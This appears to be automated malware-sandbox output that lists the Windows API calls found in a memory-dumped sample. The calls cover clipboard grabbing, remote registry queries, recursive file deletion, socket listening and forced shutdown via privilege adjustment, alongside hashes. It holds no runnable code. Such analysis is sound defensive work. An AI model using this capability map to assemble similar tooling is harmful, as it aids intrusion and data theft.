                                                                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                        • String ID: $default$winsta0
                                                                                                                                        • API String ID: 22674027-1027155976
                                                                                                                                        • Opcode ID: 1e070e6c09fc40d1eb735e2aa0f84aaebb5e865270dbf45d87bf513d33d7faea
                                                                                                                                        • Instruction ID: 0ede5e92e47fdb7f3a7ff474d0fe24c1fff08e9cbfc0a6a70a00915467e44977
                                                                                                                                        • Opcode Fuzzy Hash: 1e070e6c09fc40d1eb735e2aa0f84aaebb5e865270dbf45d87bf513d33d7faea
                                                                                                                                        • Instruction Fuzzy Hash: 22815B71901209ABDF21EFA8DC49BEE7BFDEF04704F1845A9F911B62A0DB718945CB20
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B81114
                                                                                                                                          • Part of subcall function 00B810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B80B9B,?,?,?), ref: 00B81120
                                                                                                                                          • Part of subcall function 00B810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B80B9B,?,?,?), ref: 00B8112F
                                                                                                                                          • Part of subcall function 00B810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B80B9B,?,?,?), ref: 00B81136
                                                                                                                                          • Part of subcall function 00B810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B8114D
                                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B80BCC
                                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B80C00
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B80C17
                                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00B80C51
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B80C6D
                                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B80C84
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B80C8C
                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B80C93
                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B80CB4
                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00B80CBB
                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B80CEA
                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B80D0C
                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B80D1E
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B80D45
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B80D4C
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B80D55
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B80D5C
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B80D65
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B80D6C
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B80D78
                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B80D7F
                                                                                                                                          • Part of subcall function 00B81193: GetProcessHeap.KERNEL32(00000008,00B80BB1,?,00000000,?,00B80BB1,?), ref: 00B811A1
                                                                                                                                          • Part of subcall function 00B81193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B80BB1,?), ref: 00B811A8
                                                                                                                                          • Part of subcall function 00B81193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B80BB1,?), ref: 00B811B7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                        • Opcode ID: d0e192909b78f6929d83185a118b14daafde3cfeae8a197af3c614eda21a7087
                                                                                                                                        • Instruction ID: d346b04ac096bf2cbff0fac39c3738ed2d56c6d5668ff78ebced4c0a6fac1a33
                                                                                                                                        • Opcode Fuzzy Hash: d0e192909b78f6929d83185a118b14daafde3cfeae8a197af3c614eda21a7087
                                                                                                                                        • Instruction Fuzzy Hash: A4714F7291020AAFDF50EFA4DC44FAEBBB8FF04350F1446A5E915B71A1DB71A905CB60
                                                                                                                                        APIs
                                                                                                                                        • OpenClipboard.USER32(00BBCC08), ref: 00B9EB29
                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00B9EB37
                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00B9EB43
                                                                                                                                        • CloseClipboard.USER32 ref: 00B9EB4F
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B9EB87
                                                                                                                                        • CloseClipboard.USER32 ref: 00B9EB91
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B9EBBC
                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00B9EBC9
                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 00B9EBD1
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B9EBE2
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B9EC22
                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 00B9EC38
                                                                                                                                        • GetClipboardData.USER32(0000000F), ref: 00B9EC44
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B9EC55
                                                                                                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B9EC77
                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B9EC94
                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B9ECD2
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B9ECF3
                                                                                                                                        • CountClipboardFormats.USER32 ref: 00B9ED14
                                                                                                                                        • CloseClipboard.USER32 ref: 00B9ED59
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 420908878-0
                                                                                                                                        • Opcode ID: b019509c118d23704358dbf97fd65eb0aff599e321a5c600e83aee1e545f3979
                                                                                                                                        • Instruction ID: cbe1dd9736c4b70fa2d0f7870f7c2fa243be354c185f87c7bb6cc68637c994c4
                                                                                                                                        • Opcode Fuzzy Hash: b019509c118d23704358dbf97fd65eb0aff599e321a5c600e83aee1e545f3979
                                                                                                                                        • Instruction Fuzzy Hash: DF61BF35204202AFD700EF24D885F6A7BE4EF84714F1846ADF46A972A2DF71DD45CB62
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B969BE
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B96A12
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B96A4E
                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B96A75
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B96AB2
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B96ADF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                        • API String ID: 3830820486-3289030164
                                                                                                                                        • Opcode ID: 307b23acf8b9ecb3a0022dca42b6d737e0b47ec7c79276e2c6fcda2168ed8490
                                                                                                                                        • Instruction ID: 748143a217a96c27b643b0b0aa93a73a6f1373a0a0ac302c45946486b88d121e
                                                                                                                                        • Opcode Fuzzy Hash: 307b23acf8b9ecb3a0022dca42b6d737e0b47ec7c79276e2c6fcda2168ed8490
                                                                                                                                        • Instruction Fuzzy Hash: E5D15071508310AFC710EB64D991EABB7ECAF98704F04496DF589C7191EB74DA48CB62
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B99663
                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00B996A1
                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00B996BB
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B996D3
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B996DE
                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00B996FA
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B9974A
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00BE6B7C), ref: 00B99768
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B99772
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B9977F
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B9978F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 1409584000-438819550
                                                                                                                                        • Opcode ID: 02a3af9f51bfe4238c47f941642574707eef064932c27fdffd8f849127e6ef62
                                                                                                                                        • Instruction ID: b3340dd0a97e8da22f640821c23c21424ab976e535b774b4e198b13f6d2b84c4
                                                                                                                                        • Opcode Fuzzy Hash: 02a3af9f51bfe4238c47f941642574707eef064932c27fdffd8f849127e6ef62
                                                                                                                                        • Instruction Fuzzy Hash: FA319F325006196BDF64EFB9DC49ADE7BECDF49320F1442AAE815E31A0DF74DE408A64
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00B997BE
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B99819
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B99824
                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00B99840
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B99890
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00BE6B7C), ref: 00B998AE
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B998B8
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B998C5
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B998D5
                                                                                                                                          • Part of subcall function 00B8DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B8DB00
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                        • String ID: *.*
                                                                                                                                        • API String ID: 2640511053-438819550
                                                                                                                                        • Opcode ID: ef20e8465fe1b94db91f078bfd7252a008c4ddd0d2fa978dc5bda234a7657a98
                                                                                                                                        • Instruction ID: b24e73d114ec09409f9402cdea9cfd146d2fbd16725855fffff435e4a62ba020
                                                                                                                                        • Opcode Fuzzy Hash: ef20e8465fe1b94db91f078bfd7252a008c4ddd0d2fa978dc5bda234a7657a98
                                                                                                                                        • Instruction Fuzzy Hash: 8F31A2315006196FDF64EFB9DC89ADE77ECDF06360F1442EEE810A31A1DB70DA448A64
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00BAC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAB6AE,?,?), ref: 00BAC9B5
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BAC9F1
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BACA68
                                                                                                                                          • Part of subcall function 00BAC998: _wcslen.LIBCMT ref: 00BACA9E
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BABF3E
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00BABFA9
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BABFCD
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BAC02C
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BAC0E7
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BAC154
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BAC1E9
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00BAC23A
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00BAC2E3
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BAC382
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BAC38F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3102970594-0
                                                                                                                                        • Opcode ID: 680922fbafd3f479eaa062cf79bddf782de25ae8c49efa99888524f0521c3bee
                                                                                                                                        • Instruction ID: 9b3b10712b4acb3b2fc7132390546d76609d069fb20548413988eff918b37797
                                                                                                                                        • Opcode Fuzzy Hash: 680922fbafd3f479eaa062cf79bddf782de25ae8c49efa99888524f0521c3bee
                                                                                                                                        • Instruction Fuzzy Hash: DC023E71608210AFD714DF28C895E2ABBE5EF49314F18C49DF84ADB2A2DB31ED45CB51
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B23A97,?,?,00B22E7F,?,?,?,00000000), ref: 00B23AC2
                                                                                                                                          • Part of subcall function 00B8E199: GetFileAttributesW.KERNEL32(?,00B8CF95), ref: 00B8E19A
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B8D122
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00B8D1DD
                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00B8D1F0
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B8D20D
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B8D237
                                                                                                                                          • Part of subcall function 00B8D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B8D21C,?,?), ref: 00B8D2B2
                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 00B8D253
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B8D264
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                        • String ID: \*.*
                                                                                                                                        • API String ID: 1946585618-1173974218
                                                                                                                                        • Opcode ID: ad2d20877b6fc8d39f1574e72a3cd7328f20c5f096f0c43991b57acb0a570e60
                                                                                                                                        • Instruction ID: 7c4877861248a3beb70e07ecbf21e9046beccddb4abf14becf423112e645ae59
                                                                                                                                        • Opcode Fuzzy Hash: ad2d20877b6fc8d39f1574e72a3cd7328f20c5f096f0c43991b57acb0a570e60
                                                                                                                                        • Instruction Fuzzy Hash: 36613A3180111DABCF05FFA0E9929EDBBF5AF55340F2441A6E40A771A1EB30AF09CB60
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                        • Opcode ID: 027509f10c073f7bf0fda8abfc6841311f7906e03127f147186d1de6392c7c3e
                                                                                                                                        • Instruction ID: bafeeab0e3ba54824cda442a457af2e96c65abcc15eb0d2c7f823f9455a5c7ff
                                                                                                                                        • Opcode Fuzzy Hash: 027509f10c073f7bf0fda8abfc6841311f7906e03127f147186d1de6392c7c3e
                                                                                                                                        • Instruction Fuzzy Hash: 38418E35604611AFDB10DF15E888F19BBE5FF44328F15C5A9E42A8B662CB75EC41CB90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B8170D
                                                                                                                                          • Part of subcall function 00B816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B8173A
                                                                                                                                          • Part of subcall function 00B816C3: GetLastError.KERNEL32 ref: 00B8174A
                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00B8E932
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                        • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                        • API String ID: 2234035333-3163812486
                                                                                                                                        • Opcode ID: 85d7e3277378a1505c8849619c627ee1d30d4e80a8d5b254130cbe41f6d69677
                                                                                                                                        • Instruction ID: e245ac6d2ab45a10d45c3fad185580c42c80fddc280443bea053ea341d45f060
                                                                                                                                        • Opcode Fuzzy Hash: 85d7e3277378a1505c8849619c627ee1d30d4e80a8d5b254130cbe41f6d69677
                                                                                                                                        • Instruction Fuzzy Hash: 8501A272610211ABEB6476B89C8ABBB76DCD714751F1549A2F822E31F2DAF0DC40C3A4
                                                                                                                                        APIs
                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00BA1276
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00BA1283
                                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00BA12BA
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00BA12C5
                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 00BA12F4
                                                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00BA1303
                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 00BA130D
                                                                                                                                        • closesocket.WSOCK32(00000000), ref: 00BA133C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 540024437-0
                                                                                                                                        • Opcode ID: d9065a807a5b817fa83f9b103acca3d41ce501206f1b6128d48cc7cdc2776233
                                                                                                                                        • Instruction ID: 40b7325afe110126bcbf67eb104beb8356d0fdf02f826c028f72ebaf4e9e433c
                                                                                                                                        • Opcode Fuzzy Hash: d9065a807a5b817fa83f9b103acca3d41ce501206f1b6128d48cc7cdc2776233
                                                                                                                                        • Instruction Fuzzy Hash: 0C419131604210AFD710DF28D888B29BBE5EF46318F1885C8E85A9F2D2C771EC85CBE1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B23A97,?,?,00B22E7F,?,?,?,00000000), ref: 00B23AC2
                                                                                                                                          • Part of subcall function 00B8E199: GetFileAttributesW.KERNEL32(?,00B8CF95), ref: 00B8E19A
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B8D420
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00B8D470
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B8D481
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B8D498
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00B8D4A1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
